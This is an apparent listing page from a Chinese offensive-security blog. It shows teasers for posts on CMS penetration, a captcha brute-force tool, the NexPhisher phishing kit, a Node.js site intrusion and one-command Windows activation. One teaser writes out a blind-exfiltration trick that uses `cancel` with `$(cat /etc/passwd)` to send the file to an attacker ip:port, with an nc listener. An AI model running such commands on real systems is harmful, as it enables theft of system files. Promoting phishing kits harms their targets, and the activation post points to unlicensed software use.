九某草 X站cms 渗透
这一套源码与网上那些X站cms都是一致,那么在奇安信社区上看到了这款,那么也来玩玩,这一套源码的话基本的都是存在后台提权、存储xss、反射XSS、弱口令(至于弱口令这块一般安装后直接使用admi...
Cloudflare Radar Scan 网站框架技术在线检测工具
Cloudflare Radar Scan简介 为了更好地了解世界各地的互联网使用情况,可以借助Cloudflare 的 URL 扫描器调查域、IP、URL 或 ASN 的详细信息。 截图 网站使用了哪些技术(php、mysql、nginx、wo...
验证码识别爆破python版-2.0终极版
说明 显而易见,进行了颜色显示美化。 对传参进行了优化,命令不像之前那么脓肿麻烦了,如: 设置多个自定义请求头:-lh 'xx:xx' -lh 'aa:aa' FORM 数据类型数据包传参:-d 'username=bWTdXxa2S...
nexphisher自动化钓鱼工具,包括30个网站的37个钓鱼模板
项目地址: GitHub: https://github.com/xsxtw/nexphisher nexphisher自动化钓鱼工具描述 ①NexPhisher是专为Termux和Linux开发的自动网络钓鱼工具。 ②NexPhisher这个工具有30个网站的37个网络...
奇淫技巧:linux下无回显可将回显发送到服务器
靶机无回显的情况下,可使用 cancel 来把回显发送到攻击机端 cancel -u '$(cat /etc/passwd)' -h ip:port 攻击机用nc来接收返回信息 nc -lvvp [port] 实例演示: 攻击机ip:192...
Java 学习 – 如何编译适配 java 版本的 jar 包
如何编译适配 java 版本的 jar 包 在日常浏览 github 社区的过程中,会碰到一些好用的 java 项目,但作者往往只提供源码或与本地 jdk 不适配的 jar 包,这时候可以自行进行编译 打开项目 build...
记一次Node.js站点渗透
前言 遇到一个站,后端是Node.js写的,对于这种类型的站点,一般比较难getshell,但也实现了最终的目标,拿到后台权限 信息搜集 先进行常规的信息搜集,子域名扫描、端口扫描、目录扫描等 这个...
一条命令永久激活 Windows 及 Office 重装自动激活
这几天我在网上闲逛的时候,发现了这一个激活项目,自己测试了一下感觉不错,我给大家分享一下 采用硬件激活的方式,重装系统之后,联网也会自动激活 激活方式可选 硬件永久激活 Windows Ohook ...
